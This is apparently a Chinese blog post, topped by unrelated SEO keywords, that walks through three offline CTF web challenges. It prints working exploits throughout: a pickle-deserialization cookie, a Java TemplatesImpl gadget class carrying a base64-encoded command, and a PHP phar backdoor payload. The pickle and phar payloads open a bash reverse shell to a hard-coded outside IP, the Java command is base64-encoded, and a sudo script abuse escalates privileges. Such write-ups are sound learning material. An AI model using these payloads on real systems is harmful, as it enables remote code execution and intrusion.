asp怎么新建网站,校园网站建设的重要性,微网站欣赏,wordpress百度收录优化最近在忙联通的安全准入测试#xff0c;很少有时间看CTF了#xff0c;今晚抽点时间回顾下上周线下的题(期末还没开始复习#x1f622;)
感觉做渗透测试一半的时间在和甲方掰扯水垃圾洞#xff0c;没啥惊喜感#xff0c;还是CTF有意思
目录
Mountain
ez_zhuawa
图…最近在忙联通的安全准入测试很少有时间看CTF了今晚抽点时间回顾下上周线下的题(期末还没开始复习)
感觉做渗透测试一半的时间在和甲方掰扯水垃圾洞没啥惊喜感还是CTF有意思
目录
Mountain
ez_zhuawa
图片信息查看器 Mountain
扫目录 访问./display看到 提示是photo参数/display?photoMountain1.png访问到图片 可以任意读文件 没法直接读环境变量 抓包看响应头是python题 一般就去读当前运行文件
/display?photo/proc/1/cmdline /display?photo/appppp/app.py from bottle import Bottle, route, run, template, request, response
from config.D0g3_GC import Mountain
import os
import remessages []route(/)
def home():return template(index)route(/hello)
def hello_world():try:session request.get_cookie(name, secretMountain)if not session or session[name] guest:session {name: guest}response.set_cookie(name, session, secretMountain)return template(guest, namesession[name]) if session[name] admin else Noneexcept:return hacker!!! Ive caught youroute(/display)
def get_image():photo request.query.get(photo)if photo is None:return template(display)if re.search(^../|environ|self, photo):return Hacker!!! Ill catch you no matter what you do!!!requested_path os.path.join(os.getcwd(), picture, photo)try:if photo.endswith(.png):default_png_path /appppp/picture/pngrequested_path default_png_path photowith open(pngrequested_path, rb) as f:tfile f.read()response.content_type image/pngelse:with open(requested_path) as f:tfile f.read()except Exception as e:return you have some errors, continue to try againreturn tfileroute(/admin)
def admin():session request.get_cookie(name, secretMountain)if session and session[name] admin:return template(administator, messagesmessages)else:return No permission!!!!if __name__ __main__:os.chdir(os.path.dirname(__file__))run(host0.0.0.0, port8089) 接着访问./hello 给了一段Cookie可以看到?后面的特征很像pickle序列化数据
审计代码发现可以打pickle反序列化 先去访问/display?photo/appppp/config/D0g3_GC.py拿到secretkey 拿恶意cookie的最简单方式就是自己起一个服务
from bottle import Bottle, route, run, template, request, response
import osMountainM0UNTA1ND0G3GCYYDSP0EM5S20I314Y0UARE50SMAR7
class Test:def __reduce__(self):return (eval, (__import__(os).system(bash -c bash -i /dev/tcp/27.25.151.98/1337 01),))route(/hello)
def hello_world():try:session {name: Test()}response.set_cookie(name, session, secretMountain)return okexcept:return hacker!!! Ive caught youif __name__ __main__:os.chdir(os.path.dirname(__file__))run(host0.0.0.0, port8089)
然后访问拿到恶意cookie 替换后访问靶机的./admin成功反弹shell拿flag ez_zhuawa
题目入口先是将data反序列化然后使用SPeL解析并执行param表达式表达式可以从反序列化对象中获取值(即调getter方法) 众所周知TemplatesImpl的利用链如下直接实例化TP然后调用它的getOutputProperties方法即可
TemplatesImpl#getOutputProperties() - TemplatesImpl#newTransformer() - TemplatesImpl#getTransletInstance() - TemplatesImpl#defineTransletClasses() - TransletClassLoader#defineClass()
而题目ban了一堆东西就是没ban TP Evil.java
package org.example.GCCTF.exp;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;public class Exp {public static void main(String[] args) throws Exception {byte[] codeClassPool.getDefault().get(Evil.class.getName()).toBytecode();byte[][] codes{code};TemplatesImpl templatesnew TemplatesImpl();setFieldValue(templates,_name,aaa);setFieldValue(templates,_class,null);setFieldValue(templates,_bytecodes,codes);byte[] resultserialize(templates);System.out.println(Base64.getEncoder().encodeToString(result));}public static byte[] serialize(Object object) throws IOException {ByteArrayOutputStream byteArrayOutputStreamnew ByteArrayOutputStream();ObjectOutputStream objectOutputStream new ObjectOutputStream(byteArrayOutputStream);objectOutputStream.writeObject(object);return byteArrayOutputStream.toByteArray();}public static void setFieldValue(Object obj, String field, Object val) throws Exception {Field dField obj.getClass().getDeclaredField(field);dField.setAccessible(true);dField.set(obj, val);}
}
Exp.java
package org.example.GCCTF.exp;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;public class Evil extends AbstractTranslet {public void transform(DOM document, SerializationHandler[] handlers)throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator,SerializationHandler handler) throws TransletException {}static {try {Runtime.getRuntime().exec(bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8yNy4yNS4xNTEuOTgvMTMzNyAwPiYx}|{base64,-d}|{bash,-i});} catch (IOException e) {throw new RuntimeException(e);}}
}
最后param传OutputProperties即可调用反序列化后的对象的getOutputProperties方法 环境变量读到flag 图片信息查看器
提示有hI3t.php 进来是一个文件上传功能和文件查询功能一眼phar反序列化 上传图片再读取文件信息 不难想到调用了getimagesize(不想到也行总之与文件处理相关的函数都与filterchian leak沾边)
PHP Filter链——基于oracle的文件读取攻击 - 先知社区
打filterchain读文件
用下面这个工具
https://github.com/synacktiv/php_filter_chains_oracle_exploit
python filters_chain_oracle_exploit.py --target http://125.70.243.22:31269/chal13nge.php --file /var/www/html/hI3t.php --parameter image_path 访问./x1.php发现存在一个后门类 生成恶意phar包
?phpclass backdoor
{public $cmd;function __destruct(){$cmd $this-cmd;system($cmd);}
}$anew backdoor();
$a-cmdbash -c bash -i /dev/tcp/27.25.151.98/1337 01;
$phar new Phar(gcb.phar);
$phar-startBuffering();
$phar-setStub(php __HALT_COMPILER(); ?);
$phar-setMetadata($a);
$phar-addFromString(test.txt, test);
$phar-stopBuffering(); 将生成的gcb.phar改为gcb.png上传读取 phar://uploads/gcb.png 成功弹上shell 权限不够需要提权 发现存在/tmp/rootscripts/check.sh的sudo权限 查看 /tmp/rootscripts/check.sh发现可以任意run.sh脚本执行 写恶意sh文件
echo cat /root/flag /tmp/run.sh
chmod 777 /tmp/run.sh
再sudo执行拿到flag
sudo /tmp/rootscripts/check.sh /tmp
